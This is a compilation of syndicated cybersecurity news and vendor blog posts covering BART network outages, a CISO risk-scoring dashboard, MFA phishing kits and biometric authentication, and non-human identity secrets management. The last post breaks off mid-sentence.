Technology

One strange property of quantum information is that it cannot be copied. Classical information can be duplicated perfectly and infinitely. Copy a file, and you have two identical files. At the quant… [+3555 chars]

<ul><li>News</li> <li>Education News</li> <li>News</li> <li>Hyped Samvadini and Desi AI GenZ Keyboard launched for secure messaging and multilingual communication</li></ul> Follow Us On Social Me… [+1716 chars]

<p><em>This week on the Lock and Code podcast…</em></p><p>Forget the runaway train thrillingly shot in Buster Keaton’s 1926 film “The General,” and never mind the charging locomotive rescued by actors Denzel Washington and Chris Pine in the 2010 film “Unstoppable,” as there’s a far more frequent (and far less heart-pounding) railcar drama happening across California’s Bay Area: The repeated breakdown of the Bay Area Rapid Transit (BART) system, all because of a few networking errors. </p><p>Opened in 1972, BART today carries about 175,000 people every weekday on five separate lines to 50 different stations placed across dozens of cities in the Bay Area, including San Francisco, Oakland, Berkeley, Daly City, Fremont, Richmond, and more. Its tracks and railcars travel both above ground and below, and it is one of the only public transit systems in the US that goes underwater—traveling through what is called the TransBay tube. It is likely the region’s largest public project, spanning 131 miles of track, with a fleet of more than 700 cars, proving vital to workers and residents everywhere, and on May 9, 2025, it all came grinding to a halt, due to what BART officials called a “computer networking problem.”</p><p>At the Glen Park station in San Francisco, would-be travelers found yellow caution tape at the entry gates. At the El Cerrito Plaza station, BART staff and police informed visitors that the system was down. And at the Rockridge station in Oakland, a reporter for The San Francisco Chronicle witnessed a small group of people sprinting up the stairs to try and catch a train that never came.</p><p>It was the kind of meltdown for public infrastructure that puts an entire system in peril.</p><p>And it happened again just months later.</p><p>In September, a network crash brought BART to a halt, repeating almost the exact same frustrations and delays for travelers left without transportation to work.</p><p>That’s the end of it, right? Wrong. In February 2026, <em>another</em> computer failure caused another outage. </p><p>So, in one of the wealthiest regions in America, the subway doesn’t always run, its network is prone to crash, and any money for technology often goes elsewhere. </p><p>Today, on the Lock and Code podcast with host David Ruiz, we speak with San Francisco Chronicle transportation report Rachel Swan about what the BART outages revealed about the state of the system’s aging technology, why public infrastructure so often struggles to modernize, and what exactly went wrong in the three prior outages.</p><blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow"> <p>“One piece of equipment—and again, this is old equipment—one piece breaks down and they completely lose visibility, so they don’t know where any of the trains are.”</p> </blockquote><p>Tune in today to listen to the full conversation. </p><figure class="wp-block-embed is-type-rich is-provider-spotify wp-block-embed-spotify wp-embed-aspect-21-9 wp-has-aspect-ratio"> <div class="wp-block-embed__wrapper"> </div> </figure><p><em>Show notes and credits:</em></p><p>Intro Music: “Spellbound” by Kevin MacLeod (<a href="http://incompetech.com/" rel="noreferrer noopener">incompetech.com</a>)<br>Licensed under Creative Commons: By Attribution 4.0 License<br><a href="http://creativecommons.org/licenses/by/4.0/" rel="noreferrer noopener">http://creativecommons.org/licenses/by/4.0/</a><br>Outro Music: “Good God” by Wowa (unminus.com)</p><hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"><p><strong>Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.</strong></p><p>Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our <a href="https://try.malwarebytes.com/lockandcode/">exclusive offer for Malwarebytes Premium Security for Lock and Code listeners</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/this-is-all-it-takes-to-stop-a-train-lock-and-code-s07e06/" data-a2a-title="This is all it takes to stop a train (Lock and Code S07E06)"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthis-is-all-it-takes-to-stop-a-train-lock-and-code-s07e06%2F&amp;linkname=This%20is%20all%20it%20takes%20to%20stop%20a%20train%20%28Lock%20and%20Code%20S07E06%29" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthis-is-all-it-takes-to-stop-a-train-lock-and-code-s07e06%2F&amp;linkname=This%20is%20all%20it%20takes%20to%20stop%20a%20train%20%28Lock%20and%20Code%20S07E06%29" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthis-is-all-it-takes-to-stop-a-train-lock-and-code-s07e06%2F&amp;linkname=This%20is%20all%20it%20takes%20to%20stop%20a%20train%20%28Lock%20and%20Code%20S07E06%29" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthis-is-all-it-takes-to-stop-a-train-lock-and-code-s07e06%2F&amp;linkname=This%20is%20all%20it%20takes%20to%20stop%20a%20train%20%28Lock%20and%20Code%20S07E06%29" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthis-is-all-it-takes-to-stop-a-train-lock-and-code-s07e06%2F&amp;linkname=This%20is%20all%20it%20takes%20to%20stop%20a%20train%20%28Lock%20and%20Code%20S07E06%29" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.malwarebytes.com/">Malwarebytes</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Malwarebytes">Malwarebytes</a>. Read the original post at: <a href="https://www.malwarebytes.com/blog/podcast/2026/03/this-is-all-it-takes-to-stop-a-train-lock-and-code-s07e06">https://www.malwarebytes.com/blog/podcast/2026/03/this-is-all-it-takes-to-stop-a-train-lock-and-code-s07e06</a> </p>

<p>CTG, now operating under the Cegeka Group, is rolling out a cyber resilience scoring dashboard at RSAC 2026 that boils an organization’s security posture down to one number.</p><p>The dashboard consolidates results from multiple security assessments into a single view. It produces an overall resilience score, domain-level maturity indicators, and progress tracking mapped to NIST, ISO 27001, and CIS frameworks. The idea is straightforward: give CISOs something concrete to bring into board-level conversations about risk and investment.</p><p>That gap between what security teams know and what boards can act on has been a persistent problem. CTG is positioning this tool as the bridge.</p><p>“Cybersecurity has long been a boardroom topic, but conversations are still too abstract,” said Fabrice Wynants, Global VP of Cybersecurity and Networking at Cegeka. “Executives want to understand where the organization stands, which actions are required, and whether those actions contribute to stronger cyber resilience. You can only demonstrate that with clear and consistent data.”</p><p>The dashboard is part of Cegeka’s Security Advisory Framework (CSAF), a modular system that pairs assessments with advisory services for continuous security improvement. Time-based scoring and trend visibility let organizations track whether their remediation work is actually moving the needle.</p><p>“This is not about a single absolute score,” said Chad Alessi, Managing Director of CTG Cybersecurity. “CISOs need to be able to demonstrate that they are making the right decisions, that their approach is working, and that the organization is becoming more resilient.”</p><p>CTG will be demoing the dashboard at Booth 1161 in Moscone South, March 23 through 26.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/ctg-launches-cyber-resilience-scoring-dashboard-to-give-cisos-a-single-risk-number/" data-a2a-title="CTG Launches Cyber Resilience Scoring Dashboard to Give CISOs a Single Risk Number"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fctg-launches-cyber-resilience-scoring-dashboard-to-give-cisos-a-single-risk-number%2F&amp;linkname=CTG%20Launches%20Cyber%20Resilience%20Scoring%20Dashboard%20to%20Give%20CISOs%20a%20Single%20Risk%20Number" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fctg-launches-cyber-resilience-scoring-dashboard-to-give-cisos-a-single-risk-number%2F&amp;linkname=CTG%20Launches%20Cyber%20Resilience%20Scoring%20Dashboard%20to%20Give%20CISOs%20a%20Single%20Risk%20Number" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fctg-launches-cyber-resilience-scoring-dashboard-to-give-cisos-a-single-risk-number%2F&amp;linkname=CTG%20Launches%20Cyber%20Resilience%20Scoring%20Dashboard%20to%20Give%20CISOs%20a%20Single%20Risk%20Number" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fctg-launches-cyber-resilience-scoring-dashboard-to-give-cisos-a-single-risk-number%2F&amp;linkname=CTG%20Launches%20Cyber%20Resilience%20Scoring%20Dashboard%20to%20Give%20CISOs%20a%20Single%20Risk%20Number" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fctg-launches-cyber-resilience-scoring-dashboard-to-give-cisos-a-single-risk-number%2F&amp;linkname=CTG%20Launches%20Cyber%20Resilience%20Scoring%20Dashboard%20to%20Give%20CISOs%20a%20Single%20Risk%20Number" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<div class="entry" morss_own_score="5.445652173913044" morss_score="37.61623446518499"> <img decoding="async" src="https://www.lastwatchdog.com/wp/wp-content/uploads/Fireside-Chat_2025_brshed-960x609.jpg"> <h5>By Byron V. Acohido</h5> <p>The authentication layer that corporate America spent a decade building is now a liability.</p> <p><em><strong>Listen to the podcast:</strong><a href="https://soundcloud.com/byron-acohido/token-podcast-reduce-room?si=6b6ffba72873484581bea0a16583e93b&amp;utm_source=clipboard&amp;utm_medium=text&amp;utm_campaign=social_sharing">The day MFA became the problem</a></em></p> <p>That’s the blunt assessment of Kevin Surace, chairman of <a href="https://www.tokencore.com/">Token</a>, a Rochester, N.Y.-based security company whose biometric hardware is drawing attention from enterprise security teams and federal regulators alike. Surace made the case in a recent LastWatchdog Fireside Chat podcast ahead of RSAC 2026.</p> <p>The numbers back him up. When Microsoft dismantled the <a href="https://www.microsoft.com/en-us/security/blog/2026/03/04/inside-tycoon2fa-how-a-leading-aitm-phishing-kit-operated-at-scale/">Tycoon 2FA</a> phishing kit last year, investigators confirmed the tool had been used to execute 96,000 successful break-ins — every one of them bypassing a legitimate authentication app.</p> <p>“All the MFA you’ve been using and all the auth apps you’ve been using are compromisable in minutes,” Surace said. “If someone wants to compromise them, that’s the bottom line.”</p> <p>The shift accelerated, Surace explained, when major platforms began mandating MFA. Salesforce’s move to enforce its authenticator app across its entire customer base became a flare in the sky for threat actors. Within a week, kits to defeat it were in circulation.</p> <p><a href="https://www.lastwatchdog.com/wp/wp-content/uploads/token-use-case.png"><img decoding="async" src="https://www.lastwatchdog.com/wp/wp-content/uploads/token-use-case-520x332.png"></a>Token’s answer is hardware-bound biometric authentication. The company’s Token Ring and Token BioStick devices store a user’s fingerprint locally, cryptographically bind it to a specific domain, and require physical proximity to complete a login. No credential leaves the device. No remote relay attack can replicate it.</p> <p>Insurance carriers and the FBI have begun signaling the same direction — pushing organizations toward phishing-proof biometric authentication as a baseline standard.</p> <p>“Shut the front door,” Surace said. “If the front door was closed and locked and deadbolted, you wouldn’t worry about getting in the network as much.”</p> <p><a href="https://www.lastwatchdog.com/wp/wp-content/uploads/Byron-sepia-hedcut-1.png"><img decoding="async" src="https://www.lastwatchdog.com/wp/wp-content/uploads/Byron-sepia-hedcut-1-100x139.png"></a></p> <p>Acohido</p> <p><em><a href="https://www.lastwatchdog.com/pulitzer-centennial-highlights-role-journalism/">Pulitzer Prize-winning </a>business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.</em></p> <p><em>(<strong>Editor’s note</strong>: I used Claude and ChatGPT to assist with research compilation, source discovery, and early draft structuring. All interviews, analysis, fact-checking, and final writing are my own. I remain responsible for every claim and conclusion.)</em></p> <p> <a href="https://www.facebook.com/sharer.php?u=https://www.lastwatchdog.com/fireside-chat-in-the-ai-age-your-mfa-authentication-apps-can-be-compromised-in-minutes/"><img decoding="async" src="https://www.lastwatchdog.com/wp/wp-content/plugins/simple-share-buttons-adder/buttons/somacro/facebook.png" title="Facebook"></a><a href="https://plus.google.com/share?url=https://www.lastwatchdog.com/fireside-chat-in-the-ai-age-your-mfa-authentication-apps-can-be-compromised-in-minutes/"><img decoding="async" src="https://www.lastwatchdog.com/wp/wp-content/plugins/simple-share-buttons-adder/buttons/somacro/google.png" title="Google+"></a><a href="/cdn-cgi/l/email-protection#67581412050d0204135a212e3522342e2322425557242f26335d4255572e09425557130f02425557262e4255570600024b4255571e0812154255572a21264b4255570612130f0209130e0406130e080942555706171714425557040609425557050242555704080a1715080a0e1402034255570e094255570a0e091213021441060a175c0508031e5a4255570f131317145d4848101010490b061413100613040f0308004904080a48010e1502140e03024a040f06134a0e094a130f024a060e4a0600024a1e0812154a0a01064a0612130f0209130e0406130e08094a061717144a0406094a05024a04080a1715080a0e1402034a0e094a0a0e091213021448"><img decoding="async" src="https://www.lastwatchdog.com/wp/wp-content/plugins/simple-share-buttons-adder/buttons/somacro/email.png" title="Email"></a></p> <p>March 22nd, 2026 </p> <p> </p></div><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/fireside-chat-in-the-ai-age-your-mfa-authentication-apps-can-be-compromised-in-minutes/" data-a2a-title="FIRESIDE CHAT: In the AI age, your MFA, authentication apps can be compromised in minutes"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ffireside-chat-in-the-ai-age-your-mfa-authentication-apps-can-be-compromised-in-minutes%2F&amp;linkname=FIRESIDE%20CHAT%3A%20In%20the%20AI%20age%2C%20your%20MFA%2C%20authentication%20apps%20can%20be%20compromised%20in%20minutes" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ffireside-chat-in-the-ai-age-your-mfa-authentication-apps-can-be-compromised-in-minutes%2F&amp;linkname=FIRESIDE%20CHAT%3A%20In%20the%20AI%20age%2C%20your%20MFA%2C%20authentication%20apps%20can%20be%20compromised%20in%20minutes" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ffireside-chat-in-the-ai-age-your-mfa-authentication-apps-can-be-compromised-in-minutes%2F&amp;linkname=FIRESIDE%20CHAT%3A%20In%20the%20AI%20age%2C%20your%20MFA%2C%20authentication%20apps%20can%20be%20compromised%20in%20minutes" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ffireside-chat-in-the-ai-age-your-mfa-authentication-apps-can-be-compromised-in-minutes%2F&amp;linkname=FIRESIDE%20CHAT%3A%20In%20the%20AI%20age%2C%20your%20MFA%2C%20authentication%20apps%20can%20be%20compromised%20in%20minutes" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Ffireside-chat-in-the-ai-age-your-mfa-authentication-apps-can-be-compromised-in-minutes%2F&amp;linkname=FIRESIDE%20CHAT%3A%20In%20the%20AI%20age%2C%20your%20MFA%2C%20authentication%20apps%20can%20be%20compromised%20in%20minutes" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.lastwatchdog.com">The Last Watchdog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by bacohido">bacohido</a>. Read the original post at: <a href="https://www.lastwatchdog.com/fireside-chat-in-the-ai-age-your-mfa-authentication-apps-can-be-compromised-in-minutes/">https://www.lastwatchdog.com/fireside-chat-in-the-ai-age-your-mfa-authentication-apps-can-be-compromised-in-minutes/</a> </p>

<h2>Are You Confident in Your Secrets Vaulting Strategy?</h2><p>The management of machine identities—what the industry terms Non-Human Identities (NHIs)—has become a linchpin in safeguarding cloud environments. When organizations increasingly transition to cloud-based architectures, ensuring the security of NHIs and their associated secrets is paramount. But how can organizations feel truly reassured in their secrets vaulting strategy?</p><h3>The Critical Nature of Non-Human Identities</h3><p>NHIs act as the digital emissaries of modern cybersecurity, represented by encrypted passwords, tokens, or keys. Much like a passport, these secrets are identifiers that grant machines access to various systems. Their management, however, is far more complex than mere authentication. It involves securing both the identities (analogous to a traveler) and their access credentials (akin to a passport), alongside constantly monitoring their behavior within systems.</p><p>The significance of NHI management becomes clearer when we consider the multitude of applications and systems that rely on these identities. From financial services to healthcare, and even DevOps and SOC teams, the need to secure the vast array of machine identities is universal.</p><h3>Seamless Integration and Security Gaps</h3><p>The divergence between security and research and development teams has often led to vulnerabilities. This disconnect can result in unsecured machine identities, creating exploitable opportunities for nefarious actors. Addressing this gap demands a cohesive strategy that integrates NHI management effectively across all departments.</p><p>By establishing a secure cloud environment, organizations can bridge these gaps. This involves a proactive approach that spans the entire lifecycle of NHIs—from discovery to classification, and threat detection to remediation. Unlike point solutions such as secret scanners that merely scratch the surface, a robust NHI management platform provides comprehensive insights into ownership, permissions, usage patterns, and potential vulnerabilities.</p><h3>Why Context-Aware Security Matters</h3><p>A context-aware approach to NHI management offers a panoramic view of machine identities and their secrets. With this perspective, organizations can:</p><ul> <li><strong>Reduce Risk:</strong> By proactively identifying and mitigating security risks, the likelihood of breaches and data leaks is significantly diminished.</li> <li><strong>Improve Compliance:</strong> Organizations can better meet regulatory requirements through policy enforcement and audit trails.</li> <li><strong>Enhance Efficiency:</strong> By automating the management of NHIs and secrets, security teams can redirect focus towards strategic initiatives.</li> <li><strong>Gain Enhanced Visibility and Control:</strong> A centralized view for access management and governance provides a clearer understanding of security frameworks.</li> <li><strong>Achieve Cost Savings:</strong> Automation in secrets rotation and NHIs decommissioning reduces operational costs.</li> </ul><p>The stakes are high, and the rewards of an effective strategy are substantial. While industries evolve, adopting a comprehensive NHI management strategy ensures that security measures evolve alongside.</p><h3>Real-World Applications and Insights</h3><p>In practice, integrating secrets management with cloud services like <a href="https://itnext.io/secrets-management-in-azure-for-kubernetes-with-app-configuration-key-vault-and-managed-identity-261cee3eb490" rel="noopener">Azure</a> can offer robust protection. Similarly, whilst working with Kubernetes, a harmonious integration with tools such as ArgoCD and HashiCorp Vault showcases effective secrets management, as discussed on <a href="https://www.reddit.com/r/kubernetes/comments/1jc4ise/best_way_to_integrate_argocd_and_hashicorp_vault/" rel="noopener">Reddit</a>.</p><p>For further insights on how to scale these solutions, the <a href="https://entro.security/blog/how-elastic-scaled-secrets-nhi-security-elastics-playbook-from-visibility-to-automation/">Elastic Playbook</a> provides a valuable case study. Meanwhile, the challenges posed by hybrid cloud environments necessitate an introspective look at security strategies, as explored in the <a href="https://entro.security/blog/secrets-security-in-hybrid-cloud-environments/">Secrets Security in Hybrid Cloud Environments</a> article.</p><h3>Striving for AI Security</h3><p>Incorporating AI-driven analytics within your NHI management solutions can lead to a more dynamic and adaptable security posture. AI security offers predictive insights, alerting organizations to potential threats before they materialize. With machine learning models are trained on comprehensive datasets, they’re able to identify anomalies that could indicate a breach, optimizing both detection and response times.</p><p>The integration of AI into secrets vaulting strategies not only enhances the security of machine identities but also empowers organizations with a level of foresight that previously seemed unattainable. By leveraging AI, businesses can automate routine tasks, streamline operations, and achieve a higher degree of security.</p><h3>Building a Future-Proof Strategy</h3><p>The conversation around secrets vaulting and NHI management is far from static. With technological shift, organizations must stay agile, adapting their strategies to ensure robust defenses. Emphasizing a holistic approach, companies can transcend traditional barriers, crafting solutions that address both current needs and future challenges.</p><p>Ultimately, by establishing a comprehensive strategy that incorporates these elements, organizations can achieve a sense of relief and confidence. This level of assurance is vital where threats are persistent and evolving. Consider the various facets of NHI management and their role in fortifying your security infrastructure.</p><p>Stay informed and stay secure, ensuring your enterprise remains a fortress against an evolving threats.</p><h3>Optimizing NHI Management Across Industries</h3><p>How are specific industries uniquely leveraging NHI management to tackle security challenges? With the diverse needs of sectors such as financial services, healthcare, and tech operations, understanding how these spaces employ NHI management can offer valuable insights.</p><p>In financial services, where vast amounts of sensitive data are transmitted daily, ensuring robust machine identity management is crucial. The potential consequences of a security breach, including financial loss and reputational damage, accentuate the need for a comprehensive strategy. Proactively securing NHIs not only protects against unauthorized access but also contributes significantly to maintaining customer trust and adhering to rigorous compliance standards. Leveraging AI technologies further enhances the capabilities to detect anomalies swiftly, offering a layer of preemptive defense.</p><p>Healthcare’s embrace of NHI management is underscored by the shift towards digital health records and telemedicine. The need to safeguard patient data while ensuring seamless interoperability between different healthcare systems highlights the critical nature of having secure NHIs. Here, encryption and automated secret management can mitigate potential data breaches, ensuring that patient confidentiality remains inviolable.</p><p>In DevOps and SOC teams, the journey towards enriched machine identity management is embedded. By integrating automated NHI management tools, these teams can expedite software deployment cycles while maintaining stringent security protocols. This marriage of speed and security exemplifies how comprehensive NHI strategies can support next-generation development environments.</p><h3>Navigating the Complex NHI Ecosystem</h3><p>Why does Non-Human Identities remain complex and fragmented for many organizations? While striving for comprehensive NHI management, companies must navigate various challenges that can impact their efficacy and security posture.</p><p>First, understanding the scope of machine identities infrastructure can be daunting. Organizations need to identify active NHIs and determine the level of access or privileges each identity should hold. This task is compounded by the requirement to regularly update secrets, ensuring they remain secure and don’t become potential vectors for attacks. By employing AI-driven visibility and monitoring tools, corporations can streamline this often labor-intensive process, ensuring more consistent and secure management of machine identities.</p><p>The integration of disparate systems also presents a challenge, where many organizations find themselves relying on a patchwork of security tools and platforms. This fragmentation can lead to blind spots in security coverage, providing potential vulnerabilities for cyber threats to exploit. A holistic approach that advocates for the convergence of NHI and secrets management into a unified platform can sidestep these pitfalls, fostering seamless interoperability and enhanced situational awareness.</p><p>Moreover, the dynamic nature of cyber threats necessitates an adaptable approach to NHI management. Machine identities must be constantly monitored and assessed against emerging threats. Organizations are well-positioned when leveraging a multi-faceted strategy that includes AI augmentation and real-time analytics to remain agile and responsive.</p><h3>A Collaborative Approach to NHI Management</h3><p>How can organizations foster collaboration to enhance their NHI management strategies? The future of NHIs lies not just in technological advances but also in cultivating a collaborative mindset that spans departments and teams.</p><p>Security doesn’t reside solely within IT or cybersecurity departments. A cross-functional strategy that involves stakeholders from R&amp;D, operations, and leadership teams is imperative. By facilitating dialogues between these groups, organizations can better align their security goals with business objectives, ensuring that NHI management efforts are both technically sound and strategically aligned with the organization’s mission.</p><p>Training and awareness programs also play a pivotal role in building a security-conscious culture. By equipping staff with the understanding and skills necessary to recognize potential security threats and the importance of managing machine identities, organizations can enhance their NHI security posture. This collective awareness propagation can translate into more robust and resilient defenses against potential breaches.</p><h3>Continuous Improvement with a Future Perspective</h3><p>Is your organization currently evaluating its NHI strategies for continuous improvement? The commitment to evolving NHI management should be an ongoing process, prompted by regular assessments and refinements of strategies and technologies.</p><p>Companies engaged in reflective audits of their NHI management practices often discover areas for improvement, whether in policy enforcement, automation of secrets management, or expanding the contextual understanding of NHIs across various platforms. The importance of remaining informed on <a href="https://entro.security/blog/entro-custom-secrets-self-serve-detection-rules-across-code-cloud-and-agents/">best practices and innovations</a>, when they provide the foundation for building and maintaining a resilient security posture.</p><p>Ultimately, the layered complexities of non-human identities require a strategic and forward-thinking approach, where security measures are not only robust but also nimble enough to adapt to constantly shifting security. Through the diligent application of comprehensive NHI management strategies, organizations can fortify their defenses, ensuring secure and efficient cloud environments that meet current demands and are prepared for future challenges.</p><p>The steps taken in strengthening NHI management will prove vital as the digital frontier continues to expand, making organizations more resilient and prepared for tomorrow’s opportunities and threats.</p><p>The post <a href="https://entro.security/how-relieved-are-you-with-your-secrets-vaulting-strategy/">How relieved are you with your secrets vaulting strategy</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/how-relieved-are-you-with-your-secrets-vaulting-strategy/" data-a2a-title="How relieved are you with your secrets vaulting strategy"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-relieved-are-you-with-your-secrets-vaulting-strategy%2F&amp;linkname=How%20relieved%20are%20you%20with%20your%20secrets%20vaulting%20strategy" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-relieved-are-you-with-your-secrets-vaulting-strategy%2F&amp;linkname=How%20relieved%20are%20you%20with%20your%20secrets%20vaulting%20strategy" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-relieved-are-you-with-your-secrets-vaulting-strategy%2F&amp;linkname=How%20relieved%20are%20you%20with%20your%20secrets%20vaulting%20strategy" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-relieved-are-you-with-your-secrets-vaulting-strategy%2F&amp;linkname=How%20relieved%20are%20you%20with%20your%20secrets%20vaulting%20strategy" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-relieved-are-you-with-your-secrets-vaulting-strategy%2F&amp;linkname=How%20relieved%20are%20you%20with%20your%20secrets%20vaulting%20strategy" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/how-relieved-are-you-with-your-secrets-vaulting-strategy/">https://entro.security/how-relieved-are-you-with-your-secrets-vaulting-strategy/</a> </p>

<h2>Is Your Organization’s Non-Human Identity Strategy Robust Enough?</h2><p>What if the backbone of your organization’s cybersecurity strategy is more susceptible to breaches than you think? Where machine identities increasingly outnumber human ones, focusing on Non-Human Identities (NHIs) is critical. NHIs serve as the “tourists” navigating through vast cloud environments. Much like human identities, they require a “passport”, encrypted passwords, tokens, or keys—to access various systems. But are these NHIs managed with the same precision as human credentials?</p><h3>Understanding the NHI System</h3><p>The core of an NHI system lies in its ability to manage “Secrets,” those valuable authentication tokens that grant machine identities access to different environments. Similar to how a visa complements a passport, permissions granted to these secrets determine the extent of access. This effectively transforms NHIs into dynamic entities whose lifecycle requires careful management, from their discovery and classification to threat detection and remediation.</p><p>A robust NHI management system delivers enormous <a href="https://entro.security/blog/harnessing-ai-in-ima-and-am/" rel="noopener">value</a> by identifying vulnerabilities before they become liabilities. Organizations often find themselves struggling to secure NHIs due to the disconnect between their security and R&amp;D teams. The result? Unsecured machine identities that could be gateways for potential threats.</p><h3>The Strategic Importance of NHI Management</h3><p>An effective approach to managing NHIs emphasizes a comprehensive strategy rather than relying solely on point solutions like secret scanners, which only offer partial protection. Here are some key benefits of an efficient NHI system:</p><ul> <li><strong>Reduced Risk:</strong> By proactively identifying and mitigating risks, the likelihood of breaches and data leaks is minimized.</li> <li><strong>Improved Compliance:</strong> Ensures adherence to regulatory requirements through policy enforcement and <a href="https://entro.security/blog/entro-joins-the-silverfort-isa/" rel="noopener">audit trails</a>.</li> <li><strong>Increased Efficiency:</strong> Automating the management of NHIs and secrets enables security teams to focus on strategic initiatives.</li> <li><strong>Enhanced Visibility and Control:</strong> Offers a centralized view for access management and governance, allowing better oversight of machine identities.</li> <li><strong>Cost Savings:</strong> Automating secrets rotation and decommissioning of NHIs reduces operational costs significantly.</li> </ul><h3>The Real-World Impact Across Industries</h3><p>The importance of managing NHIs resonates across different sectors. In financial services, for instance, where high-value transactions occur, a breach could be catastrophic. Efficient NHI management provides a layer of protection that helps prevent unauthorized access to sensitive information. Similarly, in healthcare, where patient data privacy is paramount, machine identities ensure that only authorized systems can access sensitive information, thus maintaining compliance with regulatory requirements like HIPAA.</p><p>In sectors that demand agility, such as DevOps and SOC teams, NHIs facilitate seamless operations. The ability to automate machine identities and secrets management allows teams to deploy new applications swiftly, without compromising on security. This is particularly crucial for organizations operating in cloud environments, where the pace of change is rapid.</p><h3>Addressing Common Challenges in NHI Management</h3><p>While the benefits of an effective NHI system are clear, challenges remain. One of the most significant hurdles is the 